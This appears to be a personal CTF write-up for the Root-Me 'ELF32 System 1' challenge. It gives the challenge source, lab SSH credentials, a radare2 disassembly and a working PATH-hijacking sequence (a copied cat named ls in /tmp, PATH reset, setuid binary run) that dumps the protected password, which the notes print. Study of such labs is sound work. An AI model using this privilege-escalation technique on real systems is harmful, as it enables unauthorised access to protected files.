tudattr/ctf-notes
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a412c6432efabcad4c5a701eb2a986e7928495ee
ctf-notes/app/bash-system-1/notes.org
Tuan-Dat Tran a412c6432e init 
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
2026-03-21 12:44:26 +01:00

3.2 KiB
Raw Blame History

Bash - System 1

Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1

Aufgabe Quellcode:

    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    int main(void)
    {
        setreuid(geteuid(), geteuid());
        system("ls /challenge/app-script/ch11/.passwd");
        return 0;
    }

Télécharger Zugangsdaten für die Übung:

Host challenge02.root-me.org Protokoll SSH Port 2222 Zugang per SSH ssh -p 2222 app-script-ch11@challenge02.root-me.org Benutzername app-script-ch11 Passwort app-script-ch11

On the system is a ch11 binary which is the compiled version of the above program Opening the compiled program in r2 we can see

$ r2 r ./ch11
[0x0000058d]> aaaa
[0x0000058d]> afl
[0x0000058d]> s main
[0x0000058d]> pdf
/ 89: int main (char **argv);
|           ; var int32_t var_ch @ ebp-0xc
|           ; arg char **argv @ esp+0x34
|           0x0000058d      8d4c2404       lea ecx, [argv]
|           0x00000591      83e4f0         and esp, 0xfffffff0
|           0x00000594      ff71fc         push dword [ecx - 4]
|           0x00000597      55             push ebp
|           0x00000598      89e5           mov ebp, esp
|           0x0000059a      56             push esi
|           0x0000059b      53             push ebx
|           0x0000059c      51             push ecx
|           0x0000059d      83ec0c         sub esp, 0xc
|           0x000005a0      e8ebfeffff     call sym.__x86.get_pc_thunk.bx
|           0x000005a5      81c32b1a0000   add ebx, 0x1a2b
|           0x000005ab      e850feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b0      89c6           mov esi, eax
|           0x000005b2      e849feffff     call sym.imp.geteuid        ; uid_t geteuid(void)
|           0x000005b7      83ec08         sub esp, 8
|           0x000005ba      56             push esi
|           0x000005bb      50             push eax
|           0x000005bc      e85ffeffff     call sym.imp.setreuid
|           0x000005c1      83c410         add esp, 0x10
|           0x000005c4      83ec0c         sub esp, 0xc
|           0x000005c7      8d83a0e6ffff   lea eax, [ebx - 0x1960]
|           0x000005cd      50             push eax                    ; const char *string
|           0x000005ce      e83dfeffff     call sym.imp.system         ; int system(const char *string)
|           0x000005d3      83c410         add esp, 0x10
|           0x000005d6      b800000000     mov eax, 0
|           0x000005db      8d65f4         lea esp, [var_ch]
|           0x000005de      59             pop ecx
|           0x000005df      5b             pop ebx
|           0x000005e0      5e             pop esi
|           0x000005e1      5d             pop ebp
|           0x000005e2      8d61fc         lea esp, [ecx - 4]
\           0x000005e5      c3             ret

app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls
app-script-ch11@challenge02:~$ ll /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ ls -lah /tmp/
ls: cannot open directory '/tmp/': Permission denied
app-script-ch11@challenge02:~$ PATH="/tmp/"
app-script-ch11@challenge02:~$ ./ch11
!oPe96a/.s8d5